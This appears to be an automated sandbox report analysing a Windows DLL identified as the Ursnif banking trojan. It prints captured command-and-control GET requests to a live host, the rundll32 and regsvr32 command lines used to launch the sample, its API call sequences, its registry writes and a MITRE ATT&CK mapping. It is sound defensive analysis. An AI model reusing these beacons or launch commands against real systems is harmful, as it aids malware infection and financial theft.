                      Source: global trafficHTTP traffic detected: GET /PdcGcGQosorY2QVhs_2/Bq9ScRQL0MmNo2gJrOrbiG/FDPb27Vu9hQGu/uY_2BMGI/NhNPnwzZnvYmoE7OGPBLQde/_2BY7mjJDF/ENcdEwVrEZJmnckQF/xH_2FgB8NMkY/CX5URbB5Mx9/tUnqO1qk0bc_2F/PzDjrCOWN7DecUA5P73Ps/FXVrTQO1zHZWe16C/R7nFvrjBN_2FbS0/Sy3O7HQGtcelrr3wGg/pY1rVDRtB/mUtxf1LfEhQfplP_2BGc/zeFFWNWagrH7B9kDL9x/Qcq2Cq8xJzMSz1YJbgWaq6/2niybL0WpOiiM/8AGzUeTW/_2FJcei9yt9KTfGqe2YPREu/h11 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app10.laptok.atConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: app10.laptok.atConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /KiETfhAdcEl7/hLoS0_2BEdS/nu4Yf9GnANVyXk/YgUltJ7zs6xEJ2nloxeBs/eATUXgJAO922GcgP/GiUgV17y_2BdX4O/qFWwhpMGMf37wi_2BX/lkJe3cdrN/7WVmaELlUteTQIErFhWc/URRkn6I1CeKadfr0Tg_/2BWPYNHHR_2F2UImJAlhjY/i7YonJ3Ydwnd_/2BgOgiB9/MYuujPMMxg18nymjpE2JqFD/0fVq8D9YsD/phg5UsKLZOQl7kqi1/VTS_2FsAFu3G/3TrEzzwsBKW/3MeaiWTLCHCZlD/OY9S51u3L9nBtrZ_2BZx7/0yqRxDj4x6MboGVE/Q0bFKfsJ98F/gfX HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app10.laptok.atConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /tej6GHOV/2OZDNZM15j8d4LuzyBm1CPL/pFWNHMsgBq/Me_2BiCKfGmnsgtGg/Rke8C0lda6PN/mYOR8uYOgwt/6eDC9ufg4E5RLJ/VOnxrPlZG6FiNtHGLC5WH/SdTzqrBTR2p_2Fsz/3qaz2VU319DSvXM/bXNaVzi_2BhoNpjBto/CdRkBvfA0/fgYhpjExPXJDXoMrOLKj/_2BnxOA04HyPM26GFwn/mFc4so9IwBrMFkh7WH8no2/C7B38PnerqkdM/EgzIMhoK/Lnz3duCdEuM_2FN4IA_2F8v/u68N1tKS6F/4NEjvBzDbxJ7ghRIM/SCFXI7ZJd_2B/V2Z4tsab_2F/VPR0GKd HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app10.laptok.atConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49776 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49775 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.4:49790 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.4:49791 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.69.19:443 -> 192.168.2.4:49806 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.69.19:443 -> 192.168.2.4:49807 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.168.38:443 -> 192.168.2.4:49804 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.168.38:443 -> 192.168.2.4:49805 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.203.98:443 -> 192.168.2.4:49811 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.203.98:443 -> 192.168.2.4:49810 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 18.156.81.187:443 -> 192.168.2.4:49813 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 18.156.81.187:443 -> 192.168.2.4:49812 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.174.68:443 -> 192.168.2.4:49815 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.174.68:443 -> 192.168.2.4:49814 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 76.223.111.131:443 -> 192.168.2.4:49820 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 76.223.111.131:443 -> 192.168.2.4:49819 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 18.195.217.206:443 -> 192.168.2.4:49822 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 18.195.217.206:443 -> 192.168.2.4:49823 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 18.197.99.6:443 -> 192.168.2.4:49836 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 18.197.99.6:443 -> 192.168.2.4:49835 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 18.156.0.31:443 -> 192.168.2.4:49838 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 18.156.0.31:443 -> 192.168.2.4:49837 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49851 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49847 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49848 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49850 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49849 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49852 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Yara detected Ursnif
                      Source: loaddll32.exe, 00000000.00000002.1180780881.00000000011DB000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      Yara detected Ursnif
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FC35A1 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_00A735A1 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError

                      System Summary:

                      Writes or reads registry keys via WMI
                      Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMI
                      Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: a04.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E051B89 NtMapViewOfSection
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E0518D1 GetProcAddress,NtCreateSection,memset
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E052485 NtQueryVirtualMemory
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FC3CA1 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FC81CD NtQueryVirtualMemory
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E051B89 NtMapViewOfSection
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E0518D1 GetProcAddress,NtCreateSection,memset
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E052485 NtQueryVirtualMemory
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_00A73CA1 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_00A781CD NtQueryVirtualMemory
                      Source: a04.dll Binary or memory string: OriginalFilenamevsmsoui.dll^ vs a04.dll
                      Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
                      Source: a04.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: a04.dll Virustotal: Detection: 59%
                      Source: a04.dll Metadefender: Detection: 17%
                      Source: a04.dll ReversingLabs: Detection: 71%
                      Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\a04.dll'
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\a04.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\a04.dll
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\a04.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\a04.dll,DllRegisterServer
                      Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:17410 /prefetch:2
                      Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:82960 /prefetch:2
                      Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:17424 /prefetch:2
                      Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:17432 /prefetch:2
                      Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:82984 /prefetch:2
                      Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{AE6AEE69-2775-11EC-90EB-ECF4BBEA1588}.dat
                      Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DFD54DA9B6AE4A4ED1.TMP
                      Source: classification engine Classification label: mal100.troj.winDLL@21/140@24/13
                      Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FC19E7 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
                      Source: a04.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: a04.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: a04.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: a04.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: a04.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: a04.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: a04.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: c:\Month\quick-major\729\Key\key.pdb source: rundll32.exe, a04.dll
                      Source: a04.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: a04.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: a04.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: a04.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: a04.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E052200 push ecx; ret 0_2_6E052209
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E052253 push ecx; ret 0_2_6E052263
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FCB67C push ss; retf 0_2_00FCB690
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FC7C20 push ecx; ret 0_2_00FC7C29
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FC7F97 push ecx; ret 0_2_00FC7FA7
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FCB163 push edx; iretd 0_2_00FCB164
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E069697 push ecx; ret 0_2_6E069698
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E067D4A push ebp; iretd 0_2_6E067D4D
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E052200 push ecx; ret 2_2_6E052209
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E052253 push ecx; ret 2_2_6E052263
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_00A77C20 push ecx; ret 2_2_00A77C29
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_00A7B67C push ss; retf 2_2_00A7B690
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_00A77F97 push ecx; ret 2_2_00A77FA7
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_00A7B163 push edx; iretd 2_2_00A7B164
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E069697 push ecx; ret 2_2_6E069698
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E067D4A push ebp; iretd 2_2_6E067D4D
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E069697 push ecx; ret 3_2_6E069698
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E067D4A push ebp; iretd 3_2_6E067D4D
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_6E069697 push ecx; ret 5_2_6E069698
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_6E067D4A push ebp; iretd 5_2_6E067D4D
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E051F31 LoadLibraryA,GetProcAddress
                      Source: initial sample Static PE information: section name: .text entropy: 6.83409400376

                      Hooking and other Techniques for Hiding and Protection:

                      Yara detected Ursnif
                      Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6336 Thread sleep count: 43 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6564 Thread sleep count: 79 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6564 Thread sleep count: 38 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6564 Thread sleep count: 144 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6564 Thread sleep count: 49 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6564 Thread sleep count: 66 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6564 Thread sleep count: 47 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6564 Thread sleep count: 34 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6564 Thread sleep count: 46 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6564 Thread sleep count: 40 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6564 Thread sleep count: 32 > 30
                      Source: C:\Windows\System32\loaddll32.exe Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\regsvr32.exe Last function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FC4E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_00A74E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E0642AD __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E09F906 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E09F83C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E09F443 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E09F906 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E09F83C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E09F443 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09F906 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09F83C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E09F443 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_6E09F906 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_6E09F83C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_6E09F443 push dword ptr fs:[00000030h]
                      Source: loaddll32.exe, 00000000.00000002.1181563164.0000000001760000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.1182344208.00000000031F0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1182967138.0000000003940000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.1182457266.00000000031F0000.00000002.00020000.sdmp Binary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000002.1181563164.0000000001760000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.1182344208.00000000031F0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1182967138.0000000003940000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.1182457266.00000000031F0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.1181563164.0000000001760000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.1182344208.00000000031F0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1182967138.0000000003940000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.1182457266.00000000031F0000.00000002.00020000.sdmp Binary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.1181563164.0000000001760000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.1182344208.00000000031F0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1182967138.0000000003940000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.1182457266.00000000031F0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,0_2_6E051566
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,2_2_6E051566
                      Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FC3946 cpuid
                      Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E051979 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E05146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FC3946 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara match, File source: Process Memory Space: loaddll32.exe PID: 5692, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 1576, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 3436, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 3160, type: MEMORYSTR

                      Remote Access Functionality:

                      Yara detected Ursnif

                      Mitre Att&ck Matrix

                      | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
                      | Valid Accounts | Windows Management Instrumentation 2 | DLL Side-Loading 1 | DLL Side-Loading 1 | Obfuscated Files or Information 2 | Input Capture 1 | System Time Discovery 1 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 1 |
                      | Default Accounts | Native API 1 | Boot or Logon Initialization Scripts | Process Injection 12 | Software Packing 2 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Input Capture 1 | Exfiltration Over Bluetooth | Encrypted Channel 21 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
                      | Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | DLL Side-Loading 1 | Security Account Manager | File and Directory Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
                      | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Masquerading 1 | NTDS | System Information Discovery 34 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud |
                      | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion 1 | LSA Secrets | Query Registry 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
                      | Replication Through Removable Media | Launchd | Rc.common | Rc.common | Process Injection 12 | Cached Domain Credentials | Security Software Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
                      | External Remote Services | Scheduled Task | Startup Items | Startup Items | Regsvr32 1 | DCSync | Virtualization/Sandbox Evasion 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
                      | Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Rundll32 1 | Proc Filesystem | Process Discovery 2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
                      | Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |

                      Behavior Graph

                      [Behavior graph: ID 498854, Sample a04.dll, Startdate 07/10/2021, Architecture WINDOWS, Score 100]


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      | Source | Detection | Scanner | Label |
                      | a04.dll | 59% | Virustotal | |
                      | a04.dll | 17% | Metadefender | |
                      | a04.dll | 71% | ReversingLabs | Win32.Trojan.Johnnie |
